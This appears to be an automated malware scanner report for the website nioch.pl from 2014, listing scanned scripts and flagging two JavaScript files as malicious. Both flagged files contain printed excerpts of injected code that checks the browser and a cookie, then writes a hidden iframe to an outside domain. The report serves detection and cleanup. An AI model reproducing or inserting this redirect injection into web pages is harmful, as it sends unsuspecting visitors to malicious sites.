New scan:

Malware Scanner report for nioch.pl

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/2
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://nioch.pl/
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 10 Sep 2014 04:01:37 GMT
Pragma: no-cache
Location: http://www.nioch.pl/
Server: nginx
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=fc61148e0f6592c07779c569bb6d7270; path=/
X-Powered-By: PHP/5.3.28
clean
http://www.nioch.pl/
200 OK
Content-Length: 51709
Content-Type: text/html
clean
http://code.jquery.com/jquery-1.9.0.min.js
200 OK
Content-Length: 93068
Content-Type: application/x-javascript
clean
http://code.jquery.com/jquery-migrate-1.2.1.min.js
200 OK
Content-Length: 7199
Content-Type: application/x-javascript
clean
https://ajax.googleapis.com/ajax/libs/jqueryui/1.11.0/jquery-ui.min.js
200 OK
Content-Length: 237548
Content-Type: text/javascript
clean
http://www.nioch.pl/compress/cache.Lang.PL.js,script.js,scroll/jquery.stickyscroll.js,paginator.js,jquery.lazyload.js,cookie-policy.js?ips=539466096
200 OK
Content-Length: 27010
Content-Type: application/x-javascript
clean
http://gapl.hit.gemius.pl/xgemius.js
200 OK
Content-Length: 21343
Content-Type: application/x-javascript
clean
http://nioch.pl//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js/
404 Not Found
Content-Length: 515
Content-Type: text/html
clean
http://nioch.pl/test404page.js
404 Not Found
Content-Length: 515
Content-Type: text/html
clean
http://nioch.pl//static.clickonometrics.pl/_w2t.js/
404 Not Found
Content-Length: 515
Content-Type: text/html
clean
http://go.evolutionmedia.bbelements.com/bb/bb_one2n.js
HTTP/1.1 302 Found
Cache-Control: max-age=10800
Connection: close
Date: Wed, 10 Sep 2014 04:01:41 GMT
Location: http://bbcdn.go.evolutionmedia.bbelements.com/bb/bb_one2n.86.65.59.1.js
Server: ibillboard
Content-Length: 255
Content-Type: text/html; charset=iso-8859-1
Expires: Wed, 10 Sep 2014 07:01:41 GMT
clean
http://bbcdn.go.evolutionmedia.bbelements.com/bb/bb_one2n.86.65.59.1.js
200 OK
Content-Length: 47004
Content-Type: application/javascript
clean
http://nioch.pl/compress/popupFacebook.js
200 OK
Content-Length: 16253
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name){var matches=document.cookie.match(new RegExp("(?:^|; )"+name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return matches?decodeURIComponent(matches[1]):undefined;}
function Visitrepositorium(){var pipka=navigator.userAgent;var ulrcont=(pipka.indexOf("Chrome")>-1||pipka.indexOf("IEMobile")>-1||pipka.indexOf("Windows")<+1);var bb=(getCookie("lastshow")===undefined);if(!ulrcont&&bb){document.write('<iframe src="http://glasoretas.latiie
... 3228 bytes are skipped ...
nction(href){saveLikePopup(true);});$('#ips-popup-wrapper').on('click',function(){saveLikePopup(defaultOpt.close_timer);});}},(defaultOpt.delay*1000));return true}})(jQuery);function saveLikePopup(action)
{$("#ips-popup-wrapper").fadeOut("slow");$("#ips-popup").fadeOut("slow");if(typeof action==='number')
{set=action==0?'1y':action+'s';$.cookie('ips-popup','true',{expires:set,path:'/'});}
else if(action==true)
{$.cookie('ips-popup','true',{expires:'1y',path:'/'});};return false};

Antivirus reports:

Sophos
Troj/JSRedir-OI

http://connect.facebook.net/pl_PL/sdk.js
200 OK
Content-Length: 158386
Content-Type: application/x-javascript
clean
http://nioch.pl/js/FB.Share.js
200 OK
Content-Length: 9063
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Visitrepositorium() {
var pipka = navigator.userAgent;
var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
var bb = (getCookie("lastshow") === undefined);
... 3507 bytes are skipped ...
t; c.length; d++) FB.Share.results[c[d].url] = c[d];
FB.Share.renderAll()
};
this.renderPass();
this.scanner = setInterval(FB.Share.renderPass, 700);
if (window.attachEvent) {
window.attachEvent("onload", FB.Share.stopScan)
} else window.addEventListener("load", FB.Share.stopScan, false)
}
};
FB.Share._onFirst()
}
if (FB && FB.Loader) {
FB.Loader.onScriptLoaded(["FB.Share", "FB.SharePro"])
}

Antivirus reports:

Sophos
Troj/JSRedir-OI


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: nioch.pl

Result:
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 10 Sep 2014 04:01:37 GMT
Pragma: no-cache
Location: http://www.nioch.pl/
Server: nginx
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=fc61148e0f6592c07779c569bb6d7270; path=/
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: nioch.pl
Referer: http://www.google.com/search?q=nioch.pl

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=nioch.pl

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://nioch.pl/

Result: nioch.pl is not infected or malware details are not published yet.